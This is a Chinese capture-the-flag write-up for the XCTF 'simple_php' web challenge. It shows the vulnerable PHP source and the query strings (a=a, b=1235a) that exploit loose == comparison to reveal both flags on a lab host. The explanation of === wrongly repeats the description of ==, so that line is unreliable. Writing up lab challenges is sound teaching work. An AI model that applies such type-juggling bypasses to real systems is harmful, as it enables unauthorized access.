登录
当前位置: 首页 > 工具软件 > Simple PHP > 使用案例 >

XCTF WEB simple_php

锺离珂
2023-12-01

https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072

题解:

  • 掌握php弱类型比较
  • php中有两种比较符号:
  • ==: 先将字符串类型转化成相同,再比较
  • ===: 先将字符串类型转化成相同,再比较
  • 字符串和数字比较使用==时,字符串会先转换为数字类型再比较 php var_dump('a' == 0);//true,这里'a'会被转换数字0 var_dump('123a' == 123);//true,这里'123a'会被转换为123
  • <?php 
show_source(__FILE__); 
include("config.php"); 
$a=@$_GET['a']; 
$b=@$_GET['b']; 
if($a==0 and $a){ 
    echo $flag1; 
} 
if(is_numeric($b)){ 
    exit(); 
} 
if($b>1234){ 
    echo $flag2; 
} 
?>

    - 前半段可以用:html http://10.10.10.175:32779/index.php?a=a ```

  • 同理var_dump('1234a' == 1234)结果为true,php的弱类型比较会忽略字母a
  • 所以后半段可以用: html http://10.10.10.175:32779/index.php?a=a&b=1235a
 类似资料:

相关阅读

相关文章

相关问答

快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.